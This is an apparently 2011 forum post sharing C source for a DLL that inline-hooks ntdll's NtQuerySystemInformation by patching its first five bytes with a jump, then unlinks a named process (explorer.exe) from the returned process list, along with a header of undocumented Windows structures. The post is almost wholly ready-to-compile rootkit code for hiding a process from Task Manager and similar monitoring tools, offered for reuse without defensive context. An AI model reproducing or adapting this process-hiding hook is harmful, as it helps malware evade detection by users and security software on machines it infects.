[c] Process Hiding - Amin_Mansouri - 10-16-2011
مخفی کردن برنامه در پروسه با زبان سی
[c] Process Hiding
Author: stdio
I didnt really see a good c example so I decided to share my dll that hooks NtQuerySystemInformation and hides explorer.exe
کد: #include <Windows.h>
#include "sysinfo.h"
BYTE OrigBytes[5];
WCHAR g_TargetProc[] = L"explorer.exe";
__declspec(naked) NTSTATUS NTAPI OriginalNtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
)
{
__asm
{
mov eax, 0dfh //5 Bytes overwritten with original read 5
mov ecx, 0xcafebabe
jmp ecx
}
}
NTSTATUS NTAPI HookedNtQuerySystemInformation(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
)
{
NTSTATUS Result;
PSYSTEM_PROCESSES pSystemProcess;
PSYSTEM_PROCESSES pNextSystemProcess;
Result = OriginalNtQuerySystemInformation(SystemInformationClass,SystemInformation,SystemInformationLength,ReturnLength);
switch(SystemInformationClass)
{
case SystemProcessInformation:
pSystemProcess = (PSYSTEM_PROCESSES)SystemInformation;
pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
while(pNextSystemProcess->NextEntryDelta != 0)
{
if (lstrcmpW((&pNextSystemProcess->ProcessName)->Buffer,g_TargetProc)==0){
pSystemProcess->NextEntryDelta += pNextSystemProcess->NextEntryDelta;
}
pSystemProcess = pNextSystemProcess;
pNextSystemProcess = (PSYSTEM_PROCESSES)((PBYTE)pSystemProcess + pSystemProcess->NextEntryDelta);
}
break;
}
return Result;
}
DWORD PlaceHook()
{
DWORD oldProtect;
LPVOID sourceFunction;
LPVOID destFunction;
LPVOID stubFunction;
destFunction = HookedNtQuerySystemInformation;
stubFunction = OriginalNtQuerySystemInformation;
sourceFunction = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
CopyMemory(OrigBytes,sourceFunction,sizeof(BYTE)*5);
if(sourceFunction == NULL){
return 1;
}
// PatchStub
VirtualProtect(stubFunction, 9, PAGE_EXECUTE_READWRITE, &oldProtect);
CopyMemory(stubFunction,OrigBytes,sizeof(BYTE)*5);
*(LPVOID*)((LPBYTE)stubFunction + 6) = ((LPBYTE)sourceFunction + 5);
VirtualProtect(stubFunction, 9, oldProtect, &oldProtect);
//PatchSource
VirtualProtect(sourceFunction, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
*(LPBYTE)sourceFunction = 0xE9;
*(LPVOID *)((LPBYTE)sourceFunction + 1) = (LPVOID)((LPBYTE)destFunction - ((LPBYTE)sourceFunction + 5));
VirtualProtect(sourceFunction, 5, oldProtect, &oldProtect);
return 0;
}
void UnHook()
{
DWORD oldProtect;
LPVOID addr = GetProcAddress(GetModuleHandle("ntdll.dll"),"NtQuerySystemInformation");
VirtualProtect(addr, 5, PAGE_EXECUTE_READWRITE, &oldProtect);
CopyMemory(addr,OrigBytes,sizeof(BYTE)*5);
VirtualProtect(addr, 5, oldProtect, &oldProtect);
}
BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD dwReason, LPVOID lpvReserved){
switch (dwReason){
case DLL_PROCESS_ATTACH:
PlaceHook();
break;
case DLL_PROCESS_DETACH:
UnHook();
break;
}
return TRUE;
}
and the header:
کد: #ifndef __SYSINFO_H__
#define __SYSINFO_H__
#ifndef NTSTATUS
#define NTSTATUS LONG
#endif
#define NT_SUCCESS(x) ((x) >= 0)
#define STATUS_SUCCESS 0x00000000
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemNextEventIdInformation,
SystemEventIdsInformation,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeperation,
SystemPlugPlayBusInformation,
SystemDockInformation,
SystemPowerInformation1,
SystemProcessorSpeedInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation
} SYSTEM_INFORMATION_CLASS, *PSYSTEM_INFORMATION_CLASS;
typedef struct _LSA_UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}LSA_UNICODE_STRING, *PLSA_UNICODE_STRING, UNICODE_STRING, *PUNICODE_STRING;
typedef CONST PUNICODE_STRING PCUNICODE_STRING;
typedef LONG KPRIORITY;
typedef struct _VM_COUNTERS {
SIZE_T PeakVirtualSize;
SIZE_T VirtualSize;
ULONG PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} VM_COUNTERS;
typedef struct _CLIENT_ID {
DWORD UniqueProcess;
DWORD UniqueThread;
} CLIENT_ID;
typedef struct _SYSTEM_THREADS {
LARGE_INTEGER KernelTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER CreateTime;
ULONG WaitTime;
PVOID StartAddress;
CLIENT_ID ClientId;
KPRIORITY Priority;
KPRIORITY BasePriority;
ULONG ContextSwitchCount;
LONG State;
LONG WaitReason;
} SYSTEM_THREADS, * PSYSTEM_THREADS;
typedef struct _SYSTEM_PROCESSES {
ULONG NextEntryDelta;
ULONG ThreadCount;
ULONG Reserved1[6];
LARGE_INTEGER CreateTime;
LARGE_INTEGER UserTime;
LARGE_INTEGER KernelTime;
UNICODE_STRING ProcessName;
KPRIORITY BasePriority;
ULONG ProcessId;
ULONG InheritedFromProcessId;
ULONG HandleCount;
ULONG Reserved2[2];
VM_COUNTERS VmCounters;
IO_COUNTERS IoCounters;
SYSTEM_THREADS Threads[1];
} SYSTEM_PROCESSES, *PSYSTEM_PROCESSES;
typedef NTSTATUS (NTAPI *__NtQuerySystemInformation)(
IN SYSTEM_INFORMATION_CLASS SystemInformationClass,
IN OUT PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength OPTIONAL
);
#endifSursa: [Doar userii inregistrati pot vedea linkurile.
|